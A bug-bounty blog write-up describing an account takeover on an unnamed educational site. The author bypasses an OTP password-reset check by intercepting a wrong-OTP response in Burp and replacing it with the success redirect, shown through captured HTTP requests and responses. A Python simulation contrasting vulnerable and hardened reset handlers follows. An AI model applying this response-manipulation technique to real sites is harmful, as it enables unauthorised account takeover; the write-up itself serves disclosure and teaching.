Hi guys,
Today I want to share one of my account takeovers, on an educational website with over 10k users.
If this article gets support, I will share more interesting vulnerabilities with you guys.❤️
Let’s get to the point …
This is the request with the correct OTP, which I sent to see what a successful response looks like. I captured it with Burp👇
The request:
Host: vulnerablewebsite.com
Cookie: vulnerablewebsite_session=thesession; XSRF-TOKEN=xsrftoken
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: https://vulnerablewebsite.com
Dnt: 1
Referer: https://vulnerablewebsite.com/collegians/forget_password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
_token=NPe4bndjMgJQtWfELILsS8haeHOrOSRIQL1K86bK&collegian_mobile=mynumber&collegian_smsCode=180787
The response:
HTTP/2 302 Found
Server: nginx
Date: Sat, 16 Nov 2024 16:06:41 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding,User-Agent
Set-Cookie: XSRF-TOKEN=xsrftoken
Set-Cookie: vulnerablewebsite_session=thesession
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://vulnerablewebsite.com/collegians/create_password
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite.com/collegians/create_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/create_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/create_password">https://vulnerablewebsite.com/collegians/create_password</a>.
</body>
</html>
And when I sent a wrong OTP I got this response:
HTTP/2 302 Found
Server: nginx
Date: Sat, 16 Nov 2024 16:07:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding,User-Agent
Set-Cookie: XSRF-TOKEN=xsrftoken
Set-Cookie: vulnerablewebsite_session=thesession
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://vulnerablewebsite.com/collegians/forget_password
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite.com/collegians/forget_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/forget_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/forget_password">https://vulnerablewebsite.com/collegians/forget_password</a>.
</body>
</html>
The important difference between these two responses is the Location header and the body. With the wrong OTP the server bounces us back to forget_password; with the correct OTP it redirects us to the create_password path:
Location: https://vulnerablewebsite.com/collegians/create_password
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite.com/collegians/create_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/create_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/create_password">https://vulnerablewebsite.com/collegians/create_password</a>.
</body>
</html>
Now comes the interesting part. I submitted a wrong OTP, intercepted the server's response in Burp, and replaced it with the successful response from above (the create_password Location header and body). The browser followed the edited redirect and the website showed me the page where I had to set a new password!!
I set my new password on that page and this request was sent to the server:
POST /collegians/create_password HTTP/2
Host: vulnerablewebsite.com
Cookie: vulnerablewebsite_session=thesession; XSRF-TOKEN=xsrftoken
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Origin: https://vulnerablewebsite.com
Dnt: 1
Referer: https://vulnerablewebsite.com/collegians/create_password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
_token=NPe4bndjMgJQtWfELILsS8haeHOrOSRIQL1K86bK&newPassword=test1234&newPassword_confirmation=test1234&remember=on
And Booom! I could go to my dashboard and the password had been changed!!
The 302 redirect is only client-side state: the browser goes wherever Location points, and I control what the browser sees. If the backend had re-checked in the POST /collegians/create_password handler that the OTP for this session had actually been verified, the attack would have failed. But it didn't … :))
And finally I could take over the account.
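To make the root cause concrete, here is an added Python model of the flow (example code, not the target site's own Laravel application). It has a forget_password handler that mirrors the redirect behaviour shown above, a create_password handler that trusts the redirect (as the site did) beside one that re-checks server-side proof that the OTP step succeeded, and an attack function that does what the Burp response manipulation does: ignore the bounce-back and post a new password anyway. The session layout (reset_mobile, a one-time otp_verified token), the in-memory user and OTP tables and the sample values are assumptions for illustration.

```python
"""Simulated OTP password-reset flow: vulnerable vs. hardened create_password.

Added example, not the vulnerable site's code. Endpoint names mirror the post;
session keys, data tables and sample values are assumed.
"""
import hmac
import secrets

# Constructed sample data: one user and the OTP the server "sent" by SMS.
USERS = {"mynumber": {"password": "old-password"}}
PENDING_OTPS = {"mynumber": "180787"}


def forget_password(session, mobile, sms_code):
    """POST /collegians/forget_password: returns the Location the 302 points to.
    Same in both variants; the flaw is in what the next step trusts."""
    expected = PENDING_OTPS.get(mobile)
    session["reset_mobile"] = mobile  # which account the next step will touch
    if expected is not None and hmac.compare_digest(expected, sms_code):
        # Server-side proof of success: a one-time token tied to this session.
        session["otp_verified"] = secrets.token_hex(16)
        return "/collegians/create_password"
    return "/collegians/forget_password"  # wrong code: bounce back


def create_password_vulnerable(session, new_password, confirmation):
    """Trusts that the browser only reaches this URL after a successful 302.
    The redirect lives in the client, so an intercepted response is enough."""
    if new_password != confirmation:
        return False
    USERS[session["reset_mobile"]]["password"] = new_password
    return True


def create_password_hardened(session, new_password, confirmation):
    """Requires server-side proof that the OTP step passed, and burns it."""
    if new_password != confirmation:
        return False
    token = session.pop("otp_verified", None)  # single use: replay fails
    mobile = session.get("reset_mobile")
    if token is None or mobile not in USERS:
        return False
    USERS[mobile]["password"] = new_password
    PENDING_OTPS.pop(mobile, None)  # the code cannot be reused either
    return True


def _reset_state():
    USERS["mynumber"]["password"] = "old-password"
    PENDING_OTPS["mynumber"] = "180787"


def attack(create_password):
    """Models the post's attack: submit a wrong OTP, ignore where the 302
    points (the attacker rewrites it in Burp) and POST a new password."""
    _reset_state()
    session = {}
    location = forget_password(session, "mynumber", "000000")  # wrong code
    assert location.endswith("forget_password")
    # Response manipulation: the client proceeds as if it had been redirected.
    changed = create_password(session, "test1234", "test1234")
    return changed, USERS["mynumber"]["password"]


def legitimate(create_password):
    """Correct OTP, then a second reset attempt with the same session."""
    _reset_state()
    session = {}
    location = forget_password(session, "mynumber", "180787")
    changed = create_password(session, "test1234", "test1234")
    password = USERS["mynumber"]["password"]
    replayed = create_password(session, "test5678", "test5678")
    return location, changed, password, replayed


if __name__ == "__main__":
    print("attack vs vulnerable:", attack(create_password_vulnerable))
    print("attack vs hardened:  ", attack(create_password_hardened))
    print("legit vs hardened:   ", legitimate(create_password_hardened))
```

Running it shows the vulnerable handler changing the password even though the OTP was wrong, while the hardened handler refuses both the manipulated flow and a replay of an already-used reset token. The general rule it demonstrates: a redirect is a hint to the browser, never an authorization decision, so every step of a multi-step flow must re-derive its permission from state the server holds.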
I hope you guys like it ❤️